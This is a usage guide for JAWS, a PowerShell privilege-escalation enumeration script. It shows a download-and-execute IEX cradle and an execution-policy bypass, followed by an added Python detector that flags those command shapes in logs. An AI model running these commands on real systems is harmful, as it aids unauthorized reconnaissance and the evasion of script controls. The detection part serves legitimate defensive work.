JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written in PowerShell 2.0, so it 'should' run on every Windows version since Windows 7.


How to

1. Download the script

  • git clone https://github.com/411Hall/JAWS.git
  • cd JAWS
  • ls

2. Start a web server

  • python3.9 -m http.server 9999

3. On the Windows computer, start PowerShell

  • powershell
  • IEX(New-Object Net.WebClient).DownloadString('')

4. Note that this time the server is not allowing some checks due to permissions. We can bypass the execution policy by running

  • powershell -ep bypass

5. Now you can try to run the script

  • .\jaws-enum.ps1

6. You can also save the output to a file

  • .\jaws-enum.ps1 -OutputFilename result.txt

7. It can be run directly from CMD

  • powershell.exe -ExecutionPolicy bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

8. Then just read the file

  • type JAWS-Enum.txt
  • type result.txt
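
Seen from the defender's side, the commands in steps 3 to 7 leave recognisable text in process-creation and script-block logs. The following is an added example (not part of the original page or of JAWS) that flags those command shapes; the sample lines and the tag names are constructed for illustration.

```python
import re

# Download cradle as typed in step 3 (IEX + Net.WebClient + DownloadString).
CRADLE = re.compile(r"\b(?:iex|invoke-expression)\b.*net\.webclient.*downloadstring", re.I)
# Script file name from the page; trivially renamed, so treat as a weak signal.
SCRIPT = re.compile(r"jaws-enum\.ps1", re.I)
HOST = re.compile(r"\b(?:powershell|pwsh)\b", re.I)


def has_policy_bypass(text):
    """True when a PowerShell host is started with -ExecutionPolicy (any
    unambiguous prefix such as -ex/-exec, or the -ep alias) set to bypass."""
    if not HOST.search(text):
        return False
    tokens = text.split()
    for name, value in zip(tokens, tokens[1:]):
        param = name[1:].lower()
        if name[0] not in "-/" or len(param) < 2:
            continue
        if (param == "ep" or "executionpolicy".startswith(param)) \
                and value.strip("'\"").lower() == "bypass":
            return True
    return False


def classify(text):
    """Return the tags (hypothetical names) matched by one logged line."""
    tags = []
    if has_policy_bypass(text):
        tags.append("policy-bypass")
    if CRADLE.search(text):
        tags.append("download-cradle")
    if SCRIPT.search(text):
        tags.append("known-script-name")
    return tags


# Constructed sample lines, shaped like the commands on this page plus one benign run.
SAMPLES = [
    r"powershell -ep bypass",
    r"powershell.exe -ExecutionPolicy bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt",
    r"IEX(New-Object Net.WebClient).DownloadString('')",
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or ["-"], line)
```

The execution-policy match is the more durable of the three signals, since the script name and the cradle text are both easy to change.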